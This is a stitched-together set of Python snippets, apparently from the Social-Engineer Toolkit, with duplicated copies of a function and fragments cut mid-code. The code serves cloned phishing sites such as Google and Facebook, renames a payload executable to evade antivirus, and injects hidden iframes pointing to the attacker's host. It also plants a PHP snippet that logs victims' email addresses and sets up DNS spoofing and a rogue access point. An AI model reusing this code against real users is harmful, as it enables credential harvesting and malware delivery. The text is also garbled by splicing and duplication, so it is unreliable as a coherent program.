core.debug_msg(core.mod_name(), "entering src.html.templates.template'", 1)

#
# used for pre-defined templates
#
print("""
  1. Java Required
  2. Google
  3. Facebook
  4. Twitter
  5. Yahoo
""")
choice = raw_input(core.setprompt(["2"], "Select a template"))

if choice == "exit":
    core.exit_set()

# file used for nextpage in java applet attack

# if nothing is selected
if choice == "":
    choice = "1"

# if java required
if choice == "1":
    if os.path.isfile("src/html/index.template"):
        os.remove("src/html/index.template")
    shutil.copyfile("src/html/templates/java/index.template", "src/html/index.template")
    url = ""

# if google
def web_server_start():
    # define if use apache or not
    apache = False
    # open set_config here
    apache_check = core.check_config("APACHE_SERVER=").lower()
    if apache_check == "on" or track_email == "on":
        apache_path = core.check_config("APACHE_DIRECTORY=")
        if os.path.isdir(os.path.join(apache_path, "html")):
            os.path.join(apache_path, "html")
        apache = True
        if operating_system == "windows":
            apache = False

    # specify the web port
    web_port = core.check_config("WEB_PORT=")

    # see if exploit requires webdav
    if os.path.isfile(os.path.join(core.setdir, "meta_config")):
        with open(os.path.join(core.setdir, "meta_config")) as fileopen:
            for line in fileopen:
                line = line.rstrip()
                match = re.search("set SRVPORT 80", line)
                if match:
                    match2 = re.search("set SRVPORT 8080", line)
                    if not match2:
                        web_port = 8080

    # check ip address
    if core.check_options("IPADDR=") != 0:
        ipaddr = core.check_options("IPADDR=")
    else:
        ipaddr = input("Enter your ip address: ")

    # unless we create template  do self
    template = "SELF"
    # Grab custom or set defined
    if os.path.isfile(os.path.join(core.setdir, "site.template")):
        with open(core.setdir, "site.template") as fileopen:
            for line in fileopen:
                line = line.rstrip()
                template_match = re.search("TEMPLATE=", line)
                url_match = re.search("URL=", line)
                if url_match:
                    # define url to clone here
                    url = line.split("=")[1].rstrip()
                if template_match:
                    template = line.split("=")[1]

    # if attach vector isn't set just set a default template
    attack_vector = "nada"
    # grab web attack selection
    if os.path.isfile(os.path.join(core.setdir, "attack_vector")):
        with open(os.path.join(core.setdir, "attack_vector")) as fileopen:
            for line in fileopen:
                attack_vector = line.rstrip()

    # Sticking it to A/V below
    rand_gen = random_string()

    # check multiattack flags here
    multiattack_harv = "off"
    if os.path.isfile(os.path.join(core.setdir, "multi_harvester")):
        multiattack_harv = "on"
    if os.path.isfile(os.path.join(core.setdir, "/multi_tabnabbing")):
        multiattack_harv = "on"

    # If SET is setting up the website for you, get the website ready for
    # delivery
    if template == "SET":
        # change to that directory
        os.chdir("src/html/")
        # remove stale index.html files
        if os.path.isfile("index.html"):
            os.remove("index.html")
        # define files and get ipaddress set in index.html

        if attack_vector == "java":
            with open("index.template") as fileopen, \
                    open("index.html", "w") as filewrite:
                for line in fileopen:
                    match1 = re.search("msf.exe", line)
                    if match1:
                        line = line.replace("msf.exe", rand_gen)
                    match = re.search("ipaddrhere", line)
                    if match:
                        line = line.replace("ipaddrhere", ipaddr)
                    filewrite.write(line)
            # move random generated name
            shutil.copyfile("msf.exe", rand_gen)

        # define browser attack vector here
        if attack_vector == "browser":
            with open("index.template") as fileopen, \
                    open("index.html", "w") as filewrite:
                for line in fileopen:
                    counter = 0
                    match = re.search(applet_name, line)
                    if match:
                        line = line.replace(applet_name, "invalid.jar")
                        filewrite.write(line)
                        counter = 1
                    match2 = re.search("<head>", line)
                    if match2:
                        if web_port != 8080:
                            line = line.replace("<head>",
                                                '<head><iframe src ="http://{0}:8080/" width="100" height="100" scrolling="no"></iframe>'.format(ipaddr))
                            filewrite.write(line)
                            counter = 1
                        if web_port == 8080:
                            line = line.replace(
                                "<head>", '<head><iframe src = "http://{0}:80/" width="100" height="100" scrolling="no" ></iframe>'.format(ipaddr))
                            filewrite.write(line)
                            counter = 1
                    if counter == 0:
                        filewrite.write(line)

    if template == "CUSTOM" or template == "SELF":
        # Bring our files to our directory
        if attack_vector != 'hid' and attack_vector != 'hijacking':
            print(core.bcolors.YELLOW + "[*] Moving payload into cloned website." + core.bcolors.ENDC)
            # copy all the files needed
            if not os.path.isfile(os.path.join(core.setdir, applet_name)):
                shutil.copyfile(os.path.join(definepath, "src/html/Signed_Update.jar.orig"), os.path.join(core.setdir, applet_name))
            shutil.copyfile(os.path.join(core.setdir, applet_name), os.path.join(core.setdir, "web_clone", applet_name))
            if os.path.isfile(os.path.join(definepath, "src/html/nix.bin")):
                nix = core.check_options("NIX.BIN=")
                shutil.copyfile(os.path.join(definepath, "src/html/nix.bin"), os.path.join(core.setdir, "web_clone", nix))
            if os.path.isfile(os.path.join(definepath, "src/html/mac.bin")):
                mac = core.check_options("MAC.BIN=")
                shutil.copyfile(os.path.join(definepath, "src/html/mac.bin"), os.path.join(core.setdir, "web_clone", mac))
            if os.path.isfile(os.path.join(core.setdir, "msf.exe")):
                win = core.check_options("MSF.EXE=")
                shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone", win))

            # pull random name generation
            core.print_status("The site has been moved. SET Web Server is now listening..")
            rand_gen = core.check_options("MSF_EXE=")
            if rand_gen:
                if os.path.isfile(os.path.join(core.setdir, "custom.exe")):
                    shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone/msf.exe"))
                    print("\n[*] Website has been cloned and custom payload imported. Have someone browse your site now")
                shutil.copyfile(os.path.join(core.setdir, "web_clone/msf.exe"), os.path.join(core.setdir, "web_clone", rand_gen))

    # if docbase exploit do some funky stuff to get it to work right
    if os.path.isfile(os.path.join(core.setdir, "docbase.file")):
        docbase = (r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
         "http://www.w3.org/TR/html4/frameset.dtd">
        <HTML>
        <HEAD>
        <TITLE></TITLE>
        </HEAD>
        <FRAMESET rows="99%%, 1%%">
        <FRAME src="site.html">
        <FRAME name=docbase noresize borders=0 scrolling=no src="http://{0}:8080">
        </FRAMESET>
        </HTML>""".format(ipaddr))
        if os.path.isfile(os.path.join(core.setdir, "web_clone/site.html")):
            os.remove(os.path.join(core.setdir, "web_clone/site.html"))
        shutil.copyfile(os.path.join(core.setdir, "web_clone/index.html"),
                        os.path.join(core.setdir, "web_clone/site.html"))
        with open(core.setdir + "/web_clone/index.html", "w") as filewrite:
            filewrite.write(docbase)

    ##########################################################################
    #
    # START WEB SERVER STUFF HERE
    #
    ##########################################################################

    if not apache:
        if multiattack_harv == 'off':
            try:
                # specify port listener here
                # specify the path for the SET web directories for the applet
                # attack
                path = os.path.join(core.setdir, "web_clone/")
                try:
                    import src.core.webserver as webserver
                    p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path))
                    p.start()
                except:
                    thread.start_new_thread(webserver.start_server, (web_port, path))

            # Handle KeyboardInterrupt
            except KeyboardInterrupt:
                core.exit_set()

            # Handle Exceptions
            except Exception as e:
                core.log(e)
                print("{0}[!] ERROR: You probably have something running on port 80 already, Apache??"
                      "[!] There was an issue, printing error: {1}{2}".format(core.bcolors.RED, e, core.bcolors.ENDC))
                stop_apache = input("Attempt to stop Apache? y/n: ")
                if stop_apache == "yes" or stop_apache == "y" or stop_apache == "":
                    subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
                    try:
                        # specify port listener here
                        import src.core.webserver as webserver
                        # specify the path for the SET web directories for the
                        # applet attack
                        path = os.path.join(core.setdir + "web_clone")
                        p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path))
                        p.start()

                    except:
                        print("{0}[!] UNABLE TO STOP APACHE! Exiting...{1}".format(core.bcolors.RED, core.bcolors.ENDC))
                        sys.exit()

            # if we are custom, put a pause here to not terminate thread on web
            # server
            if template == "CUSTOM" or template == "SELF":
                custom_exe = core.check_options("CUSTOM_EXE=")
                if custom_exe:
                    while True:
                        # try block inside of loop, if control-c detected, then
                        # exit
                        try:
                            core.print_warning("Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!")
                            input("\n{0}[*] Web Server is listening. Press Control-C to exit.{1}".format(core.bcolors.GREEN, core.bcolors.ENDC))

                        # handle keyboard interrupt
                        except KeyboardInterrupt:
                            print("{0}[*] Returning to main menu.{1}".format(core.bcolors.GREEN, core.bcolors.ENDC))
                            break

    if apache:
        subprocess.Popen("cp {0} {apache_path};"
                         "cp {1} {apache_path};"
                         "cp {2} {apache_path};"
                         "cp {3} {apache_path};"
                         "cp {4} {apache_path}".format(os.path.join(definepath, "src/html/*.bin"),
                                                       os.path.join(definepath, "src/html/*.html"),
                                                       os.path.join(core.setdir, "web_clone/*"),
                                                       os.path.join(core.setdir, "msf.exe"),
                                                       os.path.join(core.setdir, "*.jar"),
                                                       apache_path=apache_path),
                         shell=True,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE).wait()

        # if we are tracking users
        if track_email == "on":
            now = datetime.datetime.today()
            with open(os.path.join(apache_path, "harvester_{}.txt".format(now)), 'w') as filewrite:
                filewrite.write("")
            subprocess.Popen("chown www-data:www-data '{0}'".format(os.path.join(apache_path, "harvester_{}.txt".format(now))), shell=True).wait()
            # here we specify if we are tracking users and such
            with open(os.path.join(apache_path, "index.html")) as fileopen:
                data = fileopen.read()
            data = data.replace("<body>",
                                "<body>"
                                "<?php $file = 'harvester_{0}.txt'; $queryString = ''; foreach ($_GET as $key => $value) {{ $queryString .= $key . '=' . $value . '&';}}$query_string = base64_decode($queryString);file_put_contents($file, print_r(\"Email address recorded: \" . $query_string . \"\\n\", true), FILE_APPEND);?>\n"
                                "/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */".format(now))
            with open(os.path.join(apache_path, "index.php"), "w") as filewrite:
                filewrite.write(data)
            core.print_status("All files have been copied to {}".format(apache_path))

    ##########################################################################
    #
    # END WEB SERVER STUFF HERE
    #
    ##########################################################################

    if operating_system != "windows":
        # Grab metaspoit path
        msf_path = core.meta_path()
Exemple #3
0
except:
    pass

if not os.path.isfile("/etc/init.d/isc-dhcp-server"):
    core.print_warning("isc-dhcp-server does not appear to be installed.")
    core.print_warning(
        "apt-get install isc-dhcp-server to install it. Things may fail now.")

if not os.path.isfile(dnsspoof_path):
    if os.path.isfile("/usr/sbin/dnsspoof"):
        dnsspoof_path = "/usr/sbin/dnsspoof"
    else:
        core.print_warning(
            "DNSSpoof was not found. Please install or correct path in set_config. Exiting...."
        )
        core.exit_set()

if not os.path.isfile(airbase_path):
    airbase_path = "src/wireless/airbase-ng"
    core.print_info("using SET's local airbase-ng binary")

core.print_info(
    "For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface."
)
core.print_info(
    """This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")"""
)
print("")
core.print_status("SET will now launch nano to edit the file.")
core.print_status(
    "Press ^X to exit nano and don't forget to save the updated file!")
Exemple #4
0
def web_server_start():
    # define if use apache or not
    apache = False
    # open set_config here
    apache_check = core.check_config("APACHE_SERVER=").lower()
    if apache_check == "on" or track_email == "on":
        apache_path = core.check_config("APACHE_DIRECTORY=")
        if os.path.isdir(os.path.join(apache_path, "html")):
            os.path.join(apache_path, "html")
        apache = True
        if operating_system == "windows":
            apache = False

    # specify the web port
    web_port = core.check_config("WEB_PORT=")

    # see if exploit requires webdav
    if os.path.isfile(os.path.join(core.setdir, "meta_config")):
        with open(os.path.join(core.setdir, "meta_config")) as fileopen:
            for line in fileopen:
                line = line.rstrip()
                match = re.search("set SRVPORT 80", line)
                if match:
                    match2 = re.search("set SRVPORT 8080", line)
                    if not match2:
                        web_port = 8080

    # check ip address
    if core.check_options("IPADDR=") != 0:
        ipaddr = core.check_options("IPADDR=")
    else:
        ipaddr = input("Enter your ip address: ")

    # unless we create template  do self
    template = "SELF"
    # Grab custom or set defined
    if os.path.isfile(os.path.join(core.setdir, "site.template")):
        with open(core.setdir, "site.template") as fileopen:
            for line in fileopen:
                line = line.rstrip()
                template_match = re.search("TEMPLATE=", line)
                url_match = re.search("URL=", line)
                if url_match:
                    # define url to clone here
                    url = line.split("=")[1].rstrip()
                if template_match:
                    template = line.split("=")[1]

    # if attach vector isn't set just set a default template
    attack_vector = "nada"
    # grab web attack selection
    if os.path.isfile(os.path.join(core.setdir, "attack_vector")):
        with open(os.path.join(core.setdir, "attack_vector")) as fileopen:
            for line in fileopen:
                attack_vector = line.rstrip()

    # Sticking it to A/V below
    rand_gen = random_string()

    # check multiattack flags here
    multiattack_harv = "off"
    if os.path.isfile(os.path.join(core.setdir, "multi_harvester")):
        multiattack_harv = "on"
    if os.path.isfile(os.path.join(core.setdir, "/multi_tabnabbing")):
        multiattack_harv = "on"

    # If SET is setting up the website for you, get the website ready for
    # delivery
    if template == "SET":
        # change to that directory
        os.chdir("src/html/")
        # remove stale index.html files
        if os.path.isfile("index.html"):
            os.remove("index.html")
        # define files and get ipaddress set in index.html

        if attack_vector == "java":
            with open("index.template") as fileopen, \
                    open("index.html", "w") as filewrite:
                for line in fileopen:
                    match1 = re.search("msf.exe", line)
                    if match1:
                        line = line.replace("msf.exe", rand_gen)
                    match = re.search("ipaddrhere", line)
                    if match:
                        line = line.replace("ipaddrhere", ipaddr)
                    filewrite.write(line)
            # move random generated name
            shutil.copyfile("msf.exe", rand_gen)

        # define browser attack vector here
        if attack_vector == "browser":
            with open("index.template") as fileopen, \
                    open("index.html", "w") as filewrite:
                for line in fileopen:
                    counter = 0
                    match = re.search(applet_name, line)
                    if match:
                        line = line.replace(applet_name, "invalid.jar")
                        filewrite.write(line)
                        counter = 1
                    match2 = re.search("<head>", line)
                    if match2:
                        if web_port != 8080:
                            line = line.replace(
                                "<head>",
                                '<head><iframe src ="http://{0}:8080/" width="100" height="100" scrolling="no"></iframe>'
                                .format(ipaddr))
                            filewrite.write(line)
                            counter = 1
                        if web_port == 8080:
                            line = line.replace(
                                "<head>",
                                '<head><iframe src = "http://{0}:80/" width="100" height="100" scrolling="no" ></iframe>'
                                .format(ipaddr))
                            filewrite.write(line)
                            counter = 1
                    if counter == 0:
                        filewrite.write(line)

    if template == "CUSTOM" or template == "SELF":
        # Bring our files to our directory
        if attack_vector != 'hid' and attack_vector != 'hijacking':
            print(core.bcolors.YELLOW +
                  "[*] Moving payload into cloned website." +
                  core.bcolors.ENDC)
            # copy all the files needed
            if not os.path.isfile(os.path.join(core.setdir, applet_name)):
                shutil.copyfile(
                    os.path.join(definepath,
                                 "src/html/Signed_Update.jar.orig"),
                    os.path.join(core.setdir, applet_name))
            shutil.copyfile(
                os.path.join(core.setdir, applet_name),
                os.path.join(core.setdir, "web_clone", applet_name))
            if os.path.isfile(os.path.join(definepath, "src/html/nix.bin")):
                nix = core.check_options("NIX.BIN=")
                shutil.copyfile(os.path.join(definepath, "src/html/nix.bin"),
                                os.path.join(core.setdir, "web_clone", nix))
            if os.path.isfile(os.path.join(definepath, "src/html/mac.bin")):
                mac = core.check_options("MAC.BIN=")
                shutil.copyfile(os.path.join(definepath, "src/html/mac.bin"),
                                os.path.join(core.setdir, "web_clone", mac))
            if os.path.isfile(os.path.join(core.setdir, "msf.exe")):
                win = core.check_options("MSF.EXE=")
                shutil.copyfile(os.path.join(core.setdir, "msf.exe"),
                                os.path.join(core.setdir, "web_clone", win))

            # pull random name generation
            core.print_status(
                "The site has been moved. SET Web Server is now listening..")
            rand_gen = core.check_options("MSF_EXE=")
            if rand_gen:
                if os.path.isfile(os.path.join(core.setdir, "custom.exe")):
                    shutil.copyfile(
                        os.path.join(core.setdir, "msf.exe"),
                        os.path.join(core.setdir, "web_clone/msf.exe"))
                    print(
                        "\n[*] Website has been cloned and custom payload imported. Have someone browse your site now"
                    )
                shutil.copyfile(
                    os.path.join(core.setdir, "web_clone/msf.exe"),
                    os.path.join(core.setdir, "web_clone", rand_gen))

    # if docbase exploit do some funky stuff to get it to work right
    if os.path.isfile(os.path.join(core.setdir, "docbase.file")):
        docbase = (
            r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
         "http://www.w3.org/TR/html4/frameset.dtd">
        <HTML>
        <HEAD>
        <TITLE></TITLE>
        </HEAD>
        <FRAMESET rows="99%%, 1%%">
        <FRAME src="site.html">
        <FRAME name=docbase noresize borders=0 scrolling=no src="http://{0}:8080">
        </FRAMESET>
        </HTML>""".format(ipaddr))
        if os.path.isfile(os.path.join(core.setdir, "web_clone/site.html")):
            os.remove(os.path.join(core.setdir, "web_clone/site.html"))
        shutil.copyfile(os.path.join(core.setdir, "web_clone/index.html"),
                        os.path.join(core.setdir, "web_clone/site.html"))
        with open(core.setdir + "/web_clone/index.html", "w") as filewrite:
            filewrite.write(docbase)

    ##########################################################################
    #
    # START WEB SERVER STUFF HERE
    #
    ##########################################################################

    if not apache:
        if multiattack_harv == 'off':
            try:
                # specify port listener here
                # specify the path for the SET web directories for the applet
                # attack
                path = os.path.join(core.setdir, "web_clone/")
                try:
                    import src.core.webserver as webserver
                    p = multiprocessing.Process(target=webserver.start_server,
                                                args=(web_port, path))
                    p.start()
                except:
                    thread.start_new_thread(webserver.start_server,
                                            (web_port, path))

            # Handle KeyboardInterrupt
            except KeyboardInterrupt:
                core.exit_set()

            # Handle Exceptions
            except Exception as e:
                core.log(e)
                print(
                    "{0}[!] ERROR: You probably have something running on port 80 already, Apache??"
                    "[!] There was an issue, printing error: {1}{2}".format(
                        core.bcolors.RED, e, core.bcolors.ENDC))
                stop_apache = input("Attempt to stop Apache? y/n: ")
                if stop_apache == "yes" or stop_apache == "y" or stop_apache == "":
                    subprocess.Popen("/etc/init.d/apache2 stop",
                                     shell=True).wait()
                    try:
                        # specify port listener here
                        import src.core.webserver as webserver
                        # specify the path for the SET web directories for the
                        # applet attack
                        path = os.path.join(core.setdir + "web_clone")
                        p = multiprocessing.Process(
                            target=webserver.start_server,
                            args=(web_port, path))
                        p.start()

                    except:
                        print("{0}[!] UNABLE TO STOP APACHE! Exiting...{1}".
                              format(core.bcolors.RED, core.bcolors.ENDC))
                        sys.exit()

            # if we are custom, put a pause here to not terminate thread on web
            # server
            if template == "CUSTOM" or template == "SELF":
                custom_exe = core.check_options("CUSTOM_EXE=")
                if custom_exe:
                    while True:
                        # try block inside of loop, if control-c detected, then
                        # exit
                        try:
                            core.print_warning(
                                "Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!"
                            )
                            input(
                                "\n{0}[*] Web Server is listening. Press Control-C to exit.{1}"
                                .format(core.bcolors.GREEN, core.bcolors.ENDC))

                        # handle keyboard interrupt
                        except KeyboardInterrupt:
                            print("{0}[*] Returning to main menu.{1}".format(
                                core.bcolors.GREEN, core.bcolors.ENDC))
                            break

    if apache:
        subprocess.Popen("cp {0} {apache_path};"
                         "cp {1} {apache_path};"
                         "cp {2} {apache_path};"
                         "cp {3} {apache_path};"
                         "cp {4} {apache_path}".format(
                             os.path.join(definepath, "src/html/*.bin"),
                             os.path.join(definepath, "src/html/*.html"),
                             os.path.join(core.setdir, "web_clone/*"),
                             os.path.join(core.setdir, "msf.exe"),
                             os.path.join(core.setdir, "*.jar"),
                             apache_path=apache_path),
                         shell=True,
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE).wait()

        # if we are tracking users
        if track_email == "on":
            now = datetime.datetime.today()
            with open(
                    os.path.join(apache_path, "harvester_{}.txt".format(now)),
                    'w') as filewrite:
                filewrite.write("")
            subprocess.Popen("chown www-data:www-data '{0}'".format(
                os.path.join(apache_path, "harvester_{}.txt".format(now))),
                             shell=True).wait()
            # here we specify if we are tracking users and such
            with open(os.path.join(apache_path, "index.html")) as fileopen:
                data = fileopen.read()
            data = data.replace(
                "<body>", "<body>"
                "<?php $file = 'harvester_{0}.txt'; $queryString = ''; foreach ($_GET as $key => $value) {{ $queryString .= $key . '=' . $value . '&';}}$query_string = base64_decode($queryString);file_put_contents($file, print_r(\"Email address recorded: \" . $query_string . \"\\n\", true), FILE_APPEND);?>\n"
                "/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */"
                .format(now))
            with open(os.path.join(apache_path, "index.php"),
                      "w") as filewrite:
                filewrite.write(data)
            core.print_status(
                "All files have been copied to {}".format(apache_path))

    ##########################################################################
    #
    # END WEB SERVER STUFF HERE
    #
    ##########################################################################

    if operating_system != "windows":
        # Grab metaspoit path
        msf_path = core.meta_path()